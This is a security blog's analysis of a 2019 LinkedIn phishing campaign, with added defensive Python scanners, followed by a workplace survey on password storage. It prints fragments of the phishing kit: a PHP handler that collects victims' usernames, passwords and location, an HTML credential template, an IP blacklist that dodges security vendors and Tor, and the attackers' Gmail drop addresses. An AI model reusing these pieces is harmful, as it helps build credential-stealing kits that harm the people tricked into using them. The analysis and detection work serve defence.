The LinkedIn Real-time Messaging Phish of 2019

The LinkedIn Gangsters

A few days ago I received an invite from an old fintech colleague over the LinkedIn messaging service. The message read:

“Hi, I have attached a document for our new business financial proposal for your review. Access the proposal through the extension below and get back to me at your earliest convenience.

https://onedrive.live.com/?authkey=%21AFbNEI4K8RcVpmE&cid=EBDC72C570C985A5&id=EBDC72C570C985A5%21180&parId=root&o=OneUp

Coming from a 1st degree connection, this looked like a legitimate communication. But I hadn’t been in touch with my friend for a while, nor had we discussed any business recently, so this seemed a bit odd.

I texted him back via LinkedIn to verify that he indeed sent it. To my surprise, he responded in real-time with a confirmation. When I asked him if it was intended for me, he again confirmed it via the messenger application (Image 1).

LinkedIn RT Message Phish
Image 1: LinkedIn texting session

By all phishing standards, this one takes the cake. The attacker was actually conducting his exploit in real-time using my colleague’s compromised LinkedIn account. This was alarming because (1) the relatively high degree of trust that exists between you and your 1st degree network opens the door to a wide range of trust based attacks and (2) the real-time text messaging helped validate that the person that I was talking to was indeed the sender.

I switched to a sandboxed machine, clicked on the link, and went down the rabbit hole…

LinkedIn Link to OneDrive PDF
Image 2: Link from texting session to a OneDrive hosted PDF with a secondary login required to “View Message Folder”

The link to the business proposal routed to a PDF file that was hosted on a publicly accessible Microsoft OneDrive folder (Image 2).

The PDF metadata indicated that it was created recently, and dynamically, using Office365 MS Word. The file name was based on my colleague’s LinkedIn profile, and the subject of the proposal was also related to his line of work. The author name of the PDF document had the wishful name “Incoming Wire”.

LinkedIn Phish PDF Metadata
Image 3: The phishing PDF metadata

In order to “Continue reading your messages from OneDrive for Business”, I had to click on a second link titled “VIEW MESSAGE FOLDER”.  

The second link routed to the URL “https://normaav.ga/review”. This appeared to be a general access portal that aggregated different email systems and allowed the user to select their email provider of choice in order to view the “business proposal”.

LinkedIn Phish Login Portal
Image 4: The login portal loaded after clicking the PDF link

Clicking on the Office365 button option loaded a sign-in page and prompted me to enter my email address and the password for my Office365 account.

Normaav GA Office 365 Login
Image 5: The fake Office365 login page

Clicking on the other buttons resulted in the same functionality but with different email client login screens (Image 6).

LinkedIn Phish Logins
Image 6: Other email client login pages

The amount of detail built into the site was impressive. Where most phishing login pages deactivate superfluous links and features for efficiency reasons, this site was fully functional and even included the ability to reset your password, which came with a functional glyph generator and voice word reader.

Password Reset
Image 7
: Sample password reset screen

Next, I checked the .GA domain for some clues. It came back as a Gabon-based registration; however, the registrar details listed the following Netherlands address:

Domain name: NORMAAV.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:   +31 20 5315721

After a little more digging, I found that the same owner also registered several other phishing domains that included sites like:

Domain name: TECHGURUHELP.GA
Gabon TLD B.V.
My GA administrator
P.O. Box 11774
1001 GT Amsterdam
Netherlands
Phone: +31 20 5315725
Fax:   +31 20 5315721

So, from the look of it, this phishing site was just an elaborate email address and password collection utility. It wasn’t used for malware distribution or payload delivery.

The Normaav.ga site was made up of several directories, each comprising PHP, HTML, image, ZIP, and some JavaScript files. The ZIP file housed all of the executable and site code and also provided an additional layer of obfuscation from the anti-malware scanners that would be running on the hosting server.

Normaav GA File
Image 8: Sample content of one of the Normaav.ga website “file” directories

LinkedIn Phish Directory Content
Image 9: The content of the “assets” directory showing the images and icons used to create the fake login screens

As far as the mechanics of the user data collection, clicking the “Next” button on the email login screen executed the following POST handler:

<?php
// Handler behind the fake login form's "Next" button (extract from the kit).
// The systemInfo() helper and the remainder of the $data message are defined
// elsewhere in the kit and are not reproduced on this page.
if (isset($_POST['username']) && isset($_POST['password'])) {
    if ($_POST['username'] !== "" && $_POST['password'] !== "") {

        $date = date('l d F Y');
        $time = date('H:i');
        $user = $_POST['username'];
        $pass = $_POST['password'];
        $source = $_POST['from'];   // 'from' form field: the kit's source marker for this submission
        $ip = $_SERVER['REMOTE_ADDR'];
        $systemInfo = systemInfo($_SERVER['REMOTE_ADDR']);   // geo/browser lookup defined elsewhere in the kit
        $VictimInfo1 = "| Submitted by : " . $_SERVER['REMOTE_ADDR'] . " (" . gethostbyaddr($_SERVER['REMOTE_ADDR']) . ")";
        $VictimInfo2 = "| Location : " . $systemInfo['city'] . ", " . $systemInfo['region'] . ", " . $systemInfo['country'] . "";
        $VictimInfo3 = "| UserAgent : " . $systemInfo['useragent'] . "";
        $VictimInfo4 = "| Browser : " . $systemInfo['browser'] . "";
        $VictimInfo5 = "| Os : " . $systemInfo['os'] . "";
        $data = "
+ ------------- Scampage --------------+
+ Account Details
| Username : $user
| Password : $pass
| Source: $source
+ ------------------------------------+
+ Victim Information
$VictimInfo1
$VictimInfo2
$VictimInfo3
$VictimInfo4
$VictimInfo5

| Received : $date @ $time
+ ------------------------------------+
";   // the message continues in the kit; the string is closed here so the extract parses
    }
}

It’s evident from the comments that the developer didn’t even bother anonymizing the variables; they just matter-of-factly named them “Victim Information”, “VictimInfo1”, “Scampage”, etc. Apparently, in the scammer industry, ripping off people is just another dehumanized, banal job, not much different than stuffing hot dogs into a box on a production line.

Phish Victims
Image 10: Phishing victims as hot dogs

The data upload logic was also rudimentary, without any fancy command and control features. Once all of the user information was collated, the content was simply posted to a “boxoffice794@gmail.com” email address. This Gmail account turned out to be just one of over 8134 emails used for data collection. The phishing site itself also came in a number of variations, with different versions utilizing one or more of the listed email addresses (see a few samples below).
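The handler above reads the credentials from $_POST and mails them out, which is a pattern a hosting provider or incident responder can hunt for across a web root. The following is an added example, not part of the original post and not code from the kit: a small rule-based scanner that scores PHP files on the indicators visible in the snippet (a password field read from $_POST, a mail() sink, a hard-coded Gmail recipient, the “Scampage”/“Victim” vocabulary, and the gethostbyaddr() fingerprinting of the submitter). The rule weights, the threshold and the sample files are constructed for the demonstration.

```python
"""Heuristic scan for credential-harvesting PHP files on a web host.

Added example; the rules, weights and sample files are constructed and
are not taken from the kit or from any product.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Finding:
    path: str
    score: int = 0
    reasons: list = field(default_factory=list)


# (regex, weight, description). Weights are an assumption; tune per environment.
RULES = [
    (re.compile(r"\$_POST\s*\[\s*['\"](pass(word)?|pwd|passwd)['\"]\s*\]", re.I), 3,
     "reads a password field from $_POST"),
    (re.compile(r"\bmail\s*\(", re.I), 2, "calls mail() (exfiltration sink)"),
    (re.compile(r"[\w.+-]+@gmail\.com", re.I), 2, "hard-coded Gmail recipient"),
    (re.compile(r"\b(scampage|victim|hacked by|cyber team)\b", re.I), 2, "phishing-kit vocabulary"),
    (re.compile(r"\bgethostbyaddr\s*\(\s*\$_SERVER\s*\[\s*['\"]REMOTE_ADDR", re.I), 1,
     "fingerprints the submitting host"),
]

SCORE_THRESHOLD = 5  # assumption: a file at or above this is reported


def scan_source(path: str, source: str) -> Finding:
    """Score one file: every matching rule adds its weight and a reason."""
    finding = Finding(path=path)
    for regex, weight, why in RULES:
        if regex.search(source):
            finding.score += weight
            finding.reasons.append(why)
    return finding


def scan_tree(files: dict) -> list:
    """files maps path -> source text. Returns PHP findings at/above threshold, highest first."""
    hits = [scan_source(p, s) for p, s in files.items()
            if p.lower().endswith((".php", ".phtml"))]
    return sorted((h for h in hits if h.score >= SCORE_THRESHOLD), key=lambda h: -h.score)


# Constructed sample web root: one kit-like handler, one benign contact form, one JS file.
SAMPLE_FILES = {
    "review/next.php": '''<?php
if (isset($_POST['username']) && isset($_POST['password'])) {
    $user = $_POST['username']; $pass = $_POST['password'];
    $info = "| Submitted by : " . gethostbyaddr($_SERVER['REMOTE_ADDR']);
    $data = "+ --- Scampage ---+\\n| Username : $user\\n| Password : $pass\\n$info";
    mail("harvest-mailbox@gmail.com", "Account Details", $data);   // constructed recipient
}
''',
    "contact/send.php": '''<?php
// ordinary contact form: a mail() sink but no credential source
$msg = $_POST['message'];
mail("support@example.com", "Contact form", $msg);
''',
    "assets/app.js": "document.querySelector('form').submit();",
}

if __name__ == "__main__":
    for f in scan_tree(SAMPLE_FILES):
        print(f"{f.path}: score {f.score}")
        for r in f.reasons:
            print("   -", r)
```

The benign contact form also calls mail(), so a single indicator is deliberately not enough; the score only crosses the threshold when a credential source, a sink and kit artefacts appear together in the same file.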

Password Collection Email Addresses

adamandeve10000@gmail.com
emailresult1000cc@gmail.com
boxresult81@gmail.com
johnbeng95@gmail.com
tingyangting111@gmail.com
sharoncute48@gmail.com
mrtrqbing@gmail.com
chingy555@gmail.com
cleverin15@gmail.com
edu.logs1@gmail.com

Table 1: A sampling of 10 emails out of the 8134 used by the phishing sites.

From a linguistic/semantic point of view, the creator of the site and the email accounts is most likely a native speaker of American English who pays close attention to detail. The verbiage on the site has no spelling or major grammar issues. The composite names used in the email accounts demonstrate clever wordplay and use of contemporary idioms. The word generation algorithm also takes into account human readable combinations such as:

sql-injection
alibaba-reloaded
blood-money
call-me-ghost
extremely-blessed-007

Another interesting observation about the code is that it utilizes defensive strategies and countermeasures. For example, it uses a blacklist of IP addresses to stop the data uploader from running on high risk networks (like Fortinet, Kaspersky, Avg Technologies, etc.) where this activity would most likely be quickly detected and stopped. So in essence, this is a signature based form of reverse malware protection.

# _blacklist.dat  -- contains address ranges to always be blocked.
#   Only IPv4 addressing is supported.
#
#   legal range formats are:
#
#   255.255.255.255                   Single address
#   255.255.255.255/16                CIDR Mask
#   255.255.255.255/255.255.0.0       address w/mask
#   255.255.*.*                       wildcards
#   255.255.255.0-255.255.255.255     low to high address
#
#   Comments may be added to a line starting with '#' character
#   and inline comments may be added starting with '#' character.
#

#  TOR SERVERS IP RANGES

96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
96.44.189.96-96.44.189.103

#  AMAZON IP RANGES

54.219.0.0-54.219.255.255
54.193.0.0-54.193.255.255
204.236.128.0-204.236.255.255
54.242.0.0-54.243.255.255
107.20.0.0-107.23.255.255

Table 2: Extract from the blacklist used by the application in order to avoid high risk networks
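The header of _blacklist.dat documents five range syntaxes. As an added example (not the kit’s own loader, which is not reproduced on this page), here is a parser for that format plus a lookup that answers whether a given IPv4 address falls inside any listed range. An analyst can use it to see which vantage points the kit refuses to serve before deciding where to run a sandboxed walk-through, or to compare the kit’s list against their own network allocations. SAMPLE_LIST is constructed from the extract above with one added line per syntax; the 192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24 and 100.64.0.1 values are documentation/test addresses, not ranges from the kit.

```python
"""Parser for the kit's _blacklist.dat address-range syntax (added example)."""
import ipaddress


def ip_to_int(text: str) -> int:
    return int(ipaddress.IPv4Address(text.strip()))


def parse_range(entry: str) -> tuple:
    """Return (low, high) as integers for one entry in any of the five documented formats."""
    entry = entry.strip()
    if "-" in entry:                                      # low-high address
        low, high = entry.split("-", 1)
        lo, hi = ip_to_int(low), ip_to_int(high)
        if lo > hi:
            raise ValueError(f"inverted range: {entry}")
        return lo, hi
    if "/" in entry:                                      # CIDR mask or dotted mask; host bits allowed
        net = ipaddress.IPv4Network(entry, strict=False)
        return int(net.network_address), int(net.broadcast_address)
    if "*" in entry:                                      # wildcard octets
        octets = entry.split(".")
        if len(octets) != 4:
            raise ValueError(f"bad wildcard entry: {entry}")
        low = ".".join("0" if o == "*" else o for o in octets)
        high = ".".join("255" if o == "*" else o for o in octets)
        return ip_to_int(low), ip_to_int(high)
    addr = ip_to_int(entry)                               # single address
    return addr, addr


def load_blacklist(text: str) -> list:
    """Parse a file body; '#' starts either a full-line or an inline comment."""
    ranges = []
    for line in text.splitlines():
        entry = line.split("#", 1)[0].strip()
        if entry:
            ranges.append(parse_range(entry))
    return ranges


def is_blocked(ip: str, ranges: list) -> bool:
    n = ip_to_int(ip)
    return any(lo <= n <= hi for lo, hi in ranges)


# Constructed sample in the kit's format: the post's extract plus one line per syntax.
SAMPLE_LIST = """\
#  TOR SERVERS IP RANGES
96.47.226.16-96.47.226.23
74.120.15.144-74.120.15.159
#  AMAZON IP RANGES
54.219.0.0-54.219.255.255
204.236.128.0-204.236.255.255   # inline comment
198.51.100.0/24                 # CIDR mask (constructed, documentation prefix)
203.0.113.0/255.255.255.128     # dotted mask (constructed)
192.0.2.*                       # wildcard (constructed)
100.64.0.1                      # single address (constructed)
"""

if __name__ == "__main__":
    ranges = load_blacklist(SAMPLE_LIST)
    for probe in ("96.47.226.20", "54.219.1.2", "203.0.113.200", "192.0.2.77", "8.8.8.8"):
        print(probe, "blocked" if is_blocked(probe, ranges) else "allowed")
```

Ranges are normalised to integer pairs so the five syntaxes collapse into one representation; a list of several thousand entries can then be sorted and merged, which also exposes overlapping or inverted entries that a hand-maintained file tends to accumulate.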

It’s noteworthy that several of the PHP functions (see sample below) contain a reference to “MADEMEN CYBER TEAM”. The code also contains references to a specific developer using the alias “Sage The Hurt Ice”; this name is also associated with active PayPal accounts called “payp algent” and “paya_ldirect”.

Paypa_ldirect
Image 11: The author “SAGE THE HURT ICE”

<TABLE>
    <tr><td>________MADEMEN CYBER TEAM_________</td></tr>
    <tr><td><STRONG>$domain I.D: $login</STRONG></td></tr>
    <tr><td><STRONG>Password: $passwd</STRONG></td></tr>
    <tr><td><STRONG>IP: $ip</STRONG></td></tr>
    <tr><td><STRONG>Date: $server</STRONG></td></tr>
    <tr><td><STRONG>country : $country</STRONG></td></tr>
    <tr><td>Browser : $browserAgent</td></tr>
    <tr><td>____HACKED BY SAGE THE HURT ICE (SKYPE =PAYP ALGENT)____</td></tr>
</TABLE>
</BODY>

What makes this exploit so potent is that the operation combines machine generated content, a large degree of automation, and the creation of near real-time customized payloads based on LinkedIn account user data. Just as in a traditional mail merge, where each letter is customized by pulling content from different databases, the same takes place here, with the variation that the database is the user’s LinkedIn profile and the ‘mail to’ list is his entire LinkedIn network.

With all of these dynamic orchestration capabilities, the cherry on the cake is that there was also a human in the loop who chatted with the target in real-time in order to confirm the authenticity of the phish.

This exploit should be a major concern for LinkedIn and its users. In 2016, LinkedIn lost 117 million user accounts (they were hacked as early as 2012 but it wasn’t discovered until 2016). Many of these passwords have not been changed by users who are still unaware of the breach. This means that the perpetrators of the current phishing expedition are essentially shooting fish in a barrel.

Based on the Normaav.ga site uptime of 4 days (before it was flagged as ‘deceptive’ by the search engines), the volume of recovered passwords, and the number of concurrent phishing campaigns (about 10K), a conservative estimate for this campaign’s yield is over 100K newly breached accounts.

So what can you do to avoid getting your LinkedIn account hacked? Obviously, don’t click on any links sent to you via the messenger. You should stop reusing the same password for multiple accounts and make it more complex. You should also consider using a password management system. In the long run though, your best bet is to enable two factor authentication (using your phone) for all of your accounts. Most ecommerce sites like Amazon, PayPal, and email providers already offer this as a free service and activating it is just a simple two step process.

Notes
Soon after detecting the exploit, I notified LinkedIn about the details of the breach. It took LinkedIn more than 48 hours to reply. The response I got was “We have provided this information to the correct team to review further and act based on their results.”  I haven’t heard back from them since. I have also followed up with several of the victims, who were completely unaware that someone took over their LinkedIn account and was using it to mount a phishing expedition.

If you haven’t done this for a while, it may also behoove you to log in to your LinkedIn and other social media accounts just to make sure that they are still accessible.

References
2019 State of the Phish Report (page 11-19 cover estimated recovery rates) – Proofpoint.com
The complete phishing kit  (source code and files)
The phishing email addresses directory (where the stolen credentials are sent after harvesting)
LinkedIn Breach Exposed 117 Million User Accounts – eSecurity Planet
Facebook stored 200-600 millions of Instagram passwords in plain text – IT ProPortal
Password Safe – A free and open source password management system

© Copyright 2019 Yaacov Apelbaum, All Rights Reserved.

The Great Password Storage Survey

Find Milton's Password

The idea for the password survey came about more than fifteen years ago when I managed a security team in a large Fortune 500 organization. While designing a new fraud detection platform, we discovered that a significant number of previous security incidents were attributed to compromised user passwords and credentials. The data suggested that this problem affected all business divisions and departments across the company and our partners. After a successful campaign to launch a corporate-wide root cause initiative, we ran a pilot that examined the password storage and retrieval practices in one of our regional offices with about 900 employees. After concluding the initial survey, we expanded the sampling to three other corporate locations.

The results of the first survey were supplemented by data I collected a few years later while working for a managed security service company that provided hosted proxy, firewall, IDS, and anti-malware service to several hundred credit unions and community banks. The focus of the second survey was on small to medium size U.S. based financial institutions.[1]

The total population examined in the study was about 3700 accounts and individuals. The corporate units included development, IT administration, business groups, and general staff. The sampled data reflects a typical cross-section of large (20K-40K) and small to medium (20-750) sized organizations and represents a historical snapshot of password practices in a typical regulated financial service company circa 2003-2010.

4-Password found by unit

Chart 1: Password found by business unit

Background
Knowledge-based authentication that utilizes passwords is different from other access control methods because it promotes the idea that by increasing the password entropy we can resist and discourage a brute force password recovery attack.

For many security practitioners this seems like a panacea. Policies calling for additional password complexity appear attractive at first, but their practical enforcement on a multi-platform, enterprise scale is difficult to implement.

This is especially the case when we prohibit users from writing their passwords down or reusing them. The user’s inability to manage numerous complex and frequently expiring passwords can eventually compromise even the most secure environments that support multi-tiered firewalls and utilize the most advanced IDS, and robust VPN connectivity.

Paradoxically, it seems that when it comes to passwords, the user is caught between a rock and a hard place; the more secure the password is, the less so is the user.

Heterogeneous Environments and a Glut of Passwords
The never ending cycle of M&A continues to create heterogeneous platforms within the enterprise. This phenomenon results in the proliferation of systems with different rules for password lifecycles, login procedures, and authentication standards. The impact on the users has been overwhelming as they need to deal with an ever increasing number of login challenges.

Even in well consolidated enterprises that utilize state of the art Active Directory and Single Sign-On, there are a handful of work issued standalone devices and online accounts that are not tied to the central login infrastructure. Even in these integrated environments, the expiration of individual passwords is rarely synchronized, often causing a cascade of resets on other systems, with user lockouts and loss of productivity.

To further complicate this, all employees also maintain dozens of non work-related passwords that they use during their work day. This significantly increases their cognitive burden, so in an effort to conserve energy, some resort to consolidating their private and work passwords into a single file. The survey suggests that if we tally the work and private accounts, the average number of passwords each person has can exceed 60 (Chart 2).

The number of work related accounts varied with the user’s corporate responsibility (Chart 3), but on average, each had between 10-20 passwords.

1-Average number of passwords per user
Chart 2: Average number of passwords per user

Information Overload
The human factor plays a significant role in the challenge of creating, storing, and retrieving complex passwords. A number of psychological experiments have demonstrated that subjects are able to repeat accurately around eight meaningful combinations of letters, numbers, and words.[2]

When a user is given several random passwords that are eight characters long, most will remember only one. If a user is required to remember two or more such passwords, he or she will likely resort to writing them down.

When asked how many IDs and passwords they had to keep track of, the users’ immediate answer was “way too many!” The majority of users also stated that it was bad enough when they only needed a handful of passwords to access e-mail, the network and mainframe accounts; now, every internal and external application required a complex password.

2-Average number of passwords per user type
Chart 3: Average number of passwords per user type

3-Reason for writing passwords down

Chart 4: Reasons for writing passwords down

So how did the users resolve the problem of maintaining dozens of strong passwords? When pressed, most admitted—as the research suggested—that they resorted to keeping a written list or that they have been using the same password or a variant of it for multiple systems. 

On the record, administrative staff denied that they followed this practice but off the record they admitted that they were powerless to stop it and that they themselves were guilty of these same offenses. Other industry sources suggest that this is indeed a widespread phenomenon.[3]

When questioned about their memorization techniques (the policy requires that passwords be memorized), many of them indicated that utilizing mnemonics, backronyms, and other techniques was tiresome and resulted in forgetfulness, mistakes, and system lockouts.

The majority of users (75%) stated that they could not memorize complex passwords and when they attempted to achieve this in the past it always resulted in password resets. It is interesting to note that as much as 10% of the users felt that the high frequency of the password expiration did not warrant the investment in memorizing it. Another 10% of the users felt that actually writing the password down made them more productive.

5-Password issued vs. password memorized
Chart 5: Password issued vs. password memorized

Password Storage Strategies
The password searches identified two types of password storage strategies. The first group (1), which accounted for 27% of the recovered passwords, was made up of data that was either handwritten or printed and stored in the user’s immediate work area.

The written documents included artifacts such as post-it notes, legal pads, notebooks, and text on dry erase board. The second category (2) consisted of 73% of the recovered passwords found on electronic storage in the form of digital files on portable storage devices, PDAs, phones, hard drives, and network shares.

7-Password hiding locations
Chart 6: Password storage areas

The large percentage of electronically stored passwords suggests that users are somewhat security conscious and do look for a middle ground between the two evils of keeping passwords out in the open and memorizing them.

The high rate of spreadsheet utilization (35%) for password storage suggests that without a proper company sponsored tool for managing passwords like a password safe, users will instinctively gravitate toward the next ‘best’ technology available in-house.

Password Hangouts
The majority (5% each) of users hid passwords either under a mouse pad or on sticky notes that were kept in a book or folder somewhere in the user’s immediate work area. The total percentage of passwords hidden ‘under’ various items (Table 1) was 27%.

Password Locations: Office Work Area                        # Found   % of Total
Under mouse pad, stapler, or tape dispenser                    174        5%
Under keyboard                                                  86        2%
Under desk calendar                                             77        2%
Under flower pot                                                32        1%
Under garbage can                                               11        0.3%
Under printer                                                   29        1%
Under phone or phone reference card                             51        1%
Under carpet or mat                                              7        0.2%
Under bookshelf                                                 38        1%
Under paper tray                                                30        1%
Under or on whiteboard or clipboard                             61        2%
Under trivet, coaster, paper weight, or pencil holder           18        0.5%
Interior door of coat cabinet                                   18        0.5%
Sticky note on the monitor                                      40        1%
Note inside a book or wallet                                   180        5%
Note in music CD box                                            67        2%
On whiteboard obfuscated using letter or number padding         72        2%
Total                                                         1058       27%

Table 1: Hidden password locations – Office work area


Password Locations: Electronic Storage                               # Found   % of Total
On floppy disk inserted in drive                                         15        0.4%
On USB, flash drive, or other device                                     80        2%
Protected spreadsheet on a password protected network share             613       17%
MS Access database on a network share                                   216        6%
Spreadsheet on a network share                                          620       17%
Text file located on a network share                                    281        8%
e-mail file (user would create and e-mail himself the new password)     408       11%
MS Word document                                                        103        3%
File stored on an Intranet web site                                     300        8%
File stored on an Internet web site                                      26        1%
Total                                                                  2662       73%

Table 2: Hidden password locations – Electronic storage


The majority (73%) of the hidden passwords were kept on electronic storage (spreadsheets, documents, and e-mails) on a variety of locations, the most common being (1) 34% on network drive, and (2) 11% on the e-mail server (Table 2).  

Only 1% of the users openly placed the latest password on their monitor (Figure 1). It is interesting to note the password generation algorithm used. The first password on the list (which was complex) was used as the seed for all future password permutations. Each time the system required a new password, the user wrote the new one down and erased the previous one.

Whenever the system permitted the re-use of old passwords, we found a high degree of password recycling via password variances and sequential use. This included 62% of developers, 86% of administrators, 97% of business users, and 94% of admin and facility staff.  

8-User Passwords Written on a Sticky Pad 

Figure 1: User passwords written on a sticky note

 

Is there a Method in the madness?
75% of the users interviewed cited poor memory as the main reason (1) for writing and hiding passwords. The second (2) reason cited was the unspoken legitimacy of this practice and its widespread use. The third (3) reason was that the password was shared by several users, so having it written in a central location was the most convenient way to synchronize it and keep all users informed of any changes. This was primarily the case amongst DBAs, system administrators, and developers (87% combined). The majority of interviewees also acknowledged that they were aware of existing security policy that clearly discouraged such practices.

From conversations with administrative staff, ignorance of the law was not a factor in writing down passwords (Chart 8). Over 90% of the admins acknowledged that they knew that writing their system password down was against policy and information security directives, but they did it because they were located in a physically “secure area” with strict access control rules, and considered it a calculated risk.

9-Percent of administrator told not to write down passwords
Chart 7: Percent of administrators told not to write down passwords

An interesting usage relationship shows that systems which periodically require users to change passwords actually trigger more people to ‘hide’ them in written form near their workstations. We estimated that the likelihood of finding written passwords near a workstation subjected to frequent password changes was 35% to 55%. At the same sites, the likelihood was only 10% to 20% for workstations connected to systems that did not enforce frequent password changes.

In many cases, over a third of the users created sequential passwords (Chart 8) such as changing Pa$$w0rd_1 to Pa$$w0rd_2. The stats for administrative users show that this practice was higher than 80% when permitted by the system. This information again is confirmed by other studies that show the user’s tendency to avoid constantly memorizing new, complex passwords and writing them down.[4]

 10-Used sequential passwords

Chart 8: Used sequential passwords

Social Factors that Contribute to Password Mismanagement
Password security relies on the premise that passwords are kept secret at all times. This is not a trivial requirement because in a typical password life cycle, there are many opportunities for compromise whenever a password is created, used, transmitted, or stored. Passwords are always vulnerable to compromise because:

  1. They need to be initially created and assigned to a user
  2. They need to be transmitted
  3. They need to be changed
  4. They need to be stored and retrieved

In this context, sharing passwords among a group of users completely negates the requirement to keep them secret. When we asked the users about the practice of sharing passwords, the unanimous response was that this was a common practice exercised by all. In fact, the system and database administration and InfoSec teams, which should have led the charge in fighting this phenomenon, were the largest practitioners of group password sharing (Charts 9-10).

11-Password sharing among administrators
Chart 9: Password sharing among administrators

12-Password sharing among developers
Chart 10: Password sharing among developers

This contradictory situation raised several questions. When we asked the users about the clearly prohibited practice of password sharing they provided the following rationale:

  1. Friendliness––Users try to avoid behavior that would put them in a negative social light. Individuals who strictly protect their passwords by steadfastly refusing to write them down or share them with colleagues can be seen as anti-social.
  2. Conformity––Due to strong emphasis placed on “being a team player” and the importance of collaboration, many individuals determine that conformity is important and work hard to be sure that others see them as easygoing and trustworthy. For example, if a system administrator (an authority figure) asks a user for his log-in password, he is likely to reveal it because he doesn’t wish to seem suspicious of an authority figure.
  3. Trust––Sharing passwords between team members can be seen as a sign of collegial affiliation. If a user refuses to share a password with a co-worker, especially where such practice is commonplace, it could be seen as a sign of distrust.
  4. Unwritten work procedures––A team of co-workers will develop ‘informal’ procedures and workarounds to deal with occasional situations that impact their productivity (sharing workstations, using each other’s e-mail program, etc). Some of these workarounds may contradict official policies. Users who follow such informal procedures are normally acting in good faith; they are trying to be helpful and practical in an effort to get the job done.
  5. Responsibility––Users are aware of password policies, but continue to violate them nevertheless because they do not expect to be held accountable for breaking the rules, because “everyone” regards the regulations as unrealistic.
  6. Management Privileges––Senior employees believe that they are too busy to be expected to follow what they perceive as petty rules (which often IT and InfoSec are known to disregard).
  7. Relevancy––Some users believe they and their systems are not important enough to merit serious attention from an attacker. Some users also believe that rigorous passwords are neither truly realistic nor necessary and they do not see following information security policies as being relevant to their job requirements and/or professional reputation.

Security, Perception vs. Reality
Another interesting self-contradiction that affected user perception of password security was password reuse. When questioned about the practice of resetting passwords to previous ones, a large number of administrative users and developers stated that whenever the system permitted it, they did reset the new password to an older, familiar one. In some cases administrators deliberately disabled password expiration policies in order to avoid the hassle. Clearly, this practice completely defeats any advantages associated with frequent password changes.

12-Changed passwords back to original password left administrators, right developers
Chart 11: Changed passwords back to original password
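Two of the habits documented above, incrementing a counter (Pa$$w0rd_1 to Pa$$w0rd_2, Chart 8) and resetting to a previous password (Chart 11), are both things a password-change handler can refuse when the system holds a history of prior password hashes and, at change time, has the old password in plaintext because the user just typed it. As an added example, not from the survey or any product, here is such a check: reuse is detected against salted PBKDF2 hashes of prior passwords, and sequential variants are detected by normalising both the old and the candidate password (lower-case, trailing counter stripped, common character substitutions undone) and comparing edit distance. The hash parameters, history depth, substitution table and distance threshold are assumptions.

```python
"""Password-change check for reuse and sequential variants (added example)."""
import hashlib
import hmac
import os
import re

HISTORY_DEPTH = 10        # assumption: number of prior passwords remembered
MIN_EDIT_DISTANCE = 4     # assumption: normalised candidates closer than this are rejected
PBKDF2_ROUNDS = 100_000   # assumption: raise for production use

# Common substitutions undone before comparison (assumed table): $->s @->a 0->o 1->i 3->e 4->a 5->s 7->t
_LEET = str.maketrans("$@013457", "saoieast")


def derive_hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


def edit_distance(a: str, b: str) -> int:
    """Levenshtein distance, standard dynamic-programming form."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def normalize_password(p: str) -> str:
    """Lower-case, drop a trailing counter/punctuation run, undo substitutions.

    'Pa$$w0rd_1' and 'Pa$$w0rd_2' both become 'password'.
    """
    core = re.sub(r"[^a-z]+$", "", p.lower())
    return core.translate(_LEET)


class PasswordHistory:
    """Salted hashes of the last HISTORY_DEPTH passwords, newest last."""

    def __init__(self):
        self._entries = []

    def record(self, password: str) -> None:
        salt = os.urandom(16)
        self._entries.append((salt, derive_hash(password, salt)))
        del self._entries[:-HISTORY_DEPTH]

    def seen(self, candidate: str) -> bool:
        return any(hmac.compare_digest(derive_hash(candidate, salt), digest)
                   for salt, digest in self._entries)


def check_change(history: PasswordHistory, current: str, candidate: str) -> tuple:
    """Return (accepted, reason) for a proposed change from `current` to `candidate`."""
    if candidate == current:
        return False, "new password equals the current password"
    if history.seen(candidate):
        return False, "password was used before (reuse blocked)"
    n_old, n_new = normalize_password(current), normalize_password(candidate)
    if n_old == n_new or edit_distance(n_old, n_new) < MIN_EDIT_DISTANCE:
        return False, "too similar to the current password (sequential variant)"
    return True, "ok"


if __name__ == "__main__":
    hist = PasswordHistory()
    hist.record("Pa$$w0rd_1")                      # constructed starting password
    for cand in ("Pa$$w0rd_2", "Summer2019!", "correct horse battery"):
        print(cand, check_change(hist, "Pa$$w0rd_1", cand))
```

The similarity test only needs the password being replaced, which the change form already collects, so no plaintext history is kept; older passwords are only ever compared by hash.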

When we asked the users for their rationale for ignoring security policy directives and making this and other judgment calls, the answer clustered around these topics:

  1. Lack of account privacy affected general work habits and security––When users were regularly forced to write down their passwords because they lacked a tool to manage them properly, they also tended to justify keeping other sensitive information out in the open.
  2. Security mandates elicited strong emotional reactions––Users often spoke in emotional terms about unrealistic decrees, using terms like “smoke and mirrors”, “lip service”, and “window dressing”. Furthermore, they said that they wanted their information to be secure and private but at the same time they had a fatalistic attitude towards security. That is, they felt resigned to accepting security breaches and privacy compromises.
  3. Inability to differentiate between security and privacy—Users didn’t distinguish between these two concepts and mostly focused on the outcome of a security breach and its impact on their work product. In one example, an administrator did not consider the common practice of a fellow administrator using his password to be a privacy or a security issue; when the password was discovered during the survey, they simply mitigated the damage by resetting it and continued the sharing practice.
  4. Multi-user applications and social interactions influenced information sharing—Collaborative work assignments and certain business processes promoted password sharing. When it comes to account and password privacy, users working in a collaborative environment tended to have a more liberal and collective sense of account ownership.
  5. Few differences existed between home and business account management practices––Users’ lack of concern for account privacy did not depend on their work location. They were consistent in their practices whether at home or at work. Remote users who connected via VPN were less concerned about the security of their work files because they considered the likelihood of someone hacking them at home to be minimal, despite the fact that their off-site network was much less secure (many had no firewalls or up to date anti-malware protection). Also, most users working from home did not consider themselves to be a potential target of an attack.

Conclusion
The survey results suggest that the widespread practice of users writing down passwords and keeping them in unsecured locations is a natural response to unrealistic security mandates. Users in general are concerned with productivity and view password management as overhead and a dreaded chore.

